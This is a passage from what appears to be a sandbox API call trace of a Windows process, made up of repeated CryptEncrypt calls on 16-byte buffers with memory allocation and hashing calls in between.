CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.812] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.812] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.813] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] malloc (_Size=0x1fd) returned 0x3def558 [0142.814] free (_Block=0x0) [0142.814] free (_Block=0x3def350) [0142.814] free (_Block=0x3df0420) [0142.814] malloc (_Size=0x1fd) returned 0x3def350 [0142.814] free (_Block=0x0) [0142.814] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.814] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.815] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.816] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.816] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.816] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.816] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.816] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.816] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.816] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.816] malloc (_Size=0x1fd) returned 0x3df0420 [0142.816] free (_Block=0x0) [0142.816] free (_Block=0x3def558) [0142.816] malloc (_Size=0x1fd) returned 0x3def558 [0142.816] free (_Block=0x0) [0142.816] CryptDuplicateHash (in: hHash=0x432eb8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0142.816] CryptHashData (hHash=0x432db8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.816] malloc (_Size=0x14) returned 0x3f651e0 [0142.816] free (_Block=0x0) [0142.816] CryptGetHashParam (in: hHash=0x432db8, dwParam=0x2, pbData=0x3f651e0, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f651e0, pdwDataLen=0x37dfacc) returned 1 [0142.816] CryptHashData (hHash=0x432eb8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.816] free (_Block=0x3f651e0) [0142.816] CryptDestroyHash (hHash=0x432db8) returned 1 [0142.816] free (_Block=0x3def558) [0142.816] free (_Block=0x3def350) [0142.816] malloc (_Size=0x1fd) returned 0x3def350 [0142.817] free (_Block=0x0) [0142.817] malloc (_Size=0x1f2) returned 0x60cdc0 [0142.817] free (_Block=0x0) [0142.817] malloc (_Size=0x1f2) returned 0x3def558 [0142.817] free (_Block=0x0) [0142.817] free (_Block=0x0) [0142.817] free (_Block=0x60cdc0) [0142.817] malloc (_Size=0x1004) returned 0x3f68010 [0142.817] free (_Block=0x60cfc0) [0142.817] free (_Block=0x3def558) [0142.817] free (_Block=0x3def350) [0142.817] free (_Block=0x3df0420) [0142.817] malloc (_Size=0x1fd) returned 0x3df0420 [0142.817] free (_Block=0x0) [0142.817] malloc (_Size=0x1fd) returned 0x3def350 [0142.817] free (_Block=0x0) [0142.818] free (_Block=0x0) [0142.818] free (_Block=0x3df0420) [0142.818] malloc (_Size=0x1fd) returned 0x3df0420 [0142.818] free (_Block=0x0) [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.819] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.820] malloc (_Size=0x1fd) returned 0x3def558 [0142.820] free (_Block=0x0) [0142.820] free (_Block=0x3def350) [0142.820] free (_Block=0x3df0420) [0142.820] malloc (_Size=0x1fd) returned 0x3def350 [0142.820] free (_Block=0x0) [0142.820] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] 